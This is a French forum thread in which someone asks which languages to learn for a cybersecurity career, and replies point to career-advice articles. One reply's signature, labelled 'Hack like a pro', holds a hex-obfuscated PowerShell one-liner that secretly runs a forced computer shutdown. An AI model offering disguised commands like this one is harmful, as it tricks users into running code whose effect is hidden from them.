Annonce

Réduire
Aucune annonce.

Conseils pour m'orienter

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Conseils pour m'orienter

    Bonsoir ,

    J’espère écrire dans la bonne section et surtout que mon post ne sera pas un doublon pour éviter de fâcher les Saints Modérateurs .
    Je suis en voie d'aller aux états unis afin d'y étudier mais je dois choisir ma filière ( je compte opter pour la sécurité informatique ) . Pour des raisons personnelles j'ai été plus ou moins déconnecté du monde de l'informatique ces deux dernières années (Je sais c'est choquant , ne pleurez pas .) et vu que je dois voyager afin de reprendre mes études j'aimerai savoir quels sont les langages que je dois plus ou moins maitriser pour entrer dans ce domaine ? (Quels sont les langages pré requis pour apprendre le hacking ?) .

    Merci pour votre assistance .
    Dernière modification par Arkadia, 21 décembre 2018, 04h59.

  • #2
    Salut !

    Envoyé par Arkadia Voir le message
    Je suis nouveau sur ce forum du moins je me suis inscrit mais je n'ai pas fait long feu , j'y suis inscrit car je débute dans une filière de programmation informatique mais plus tard j'aimerai me rediriger vers la Sécurité informatique .
    Du coup ça avait merdé ?

    Pour ce qui est de rentrer dans le "domaine de la sécurité informatique", c'est super vague. Ya pleins de "métiers" différents dans ce domaine, qui demanderons des compétences également différentes.
    Tu peux jeter un oeil à ça pour avoir les idées un peu plus claires : https://www.ssi.gouv.fr/particulier/...cybersecurite/

    Qu'est-ce que tu entends exactement par "apprendre le hacking" ? Est-ce que tu as déjà une vision claire de ce que tu as véritablement envie de faire ?
    Un autre chouette article qui tente de répondre à ta question : https://moxie.org/blog/career-advice/
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Envoyé par Krisscool Voir le message
      Salut !
      Du coup ça avait merdé ?
      Non Loin de là , j'ai obtenu ma license . Juste que je me suis détaché des recherches à cause de "mes problèmes" et je juge que je n'ai carrément pas le niveau pour rejoindre une école en ce moment . Donc j'ai décidé de prendre une année de remise à niveau avant de m'inscrire dans une nouvelle école .


      Envoyé par Krisscool Voir le message
      Qu'est-ce que tu entends exactement par "apprendre le hacking" ? Est-ce que tu as déjà une vision claire de ce que tu as véritablement envie de faire ?
      Vu ma nationalité américain j'ai décide que mon plan de route soit celui ci : École de cybersécurité > Service Militaire > Entrer dans l'armée dans le département lié à la sécurité .
      Juste que je suis un peu (beaucoup) perdu et je ne sais pas où commencer pour me remettre à niveau .

      Commentaire

      Chargement...
      X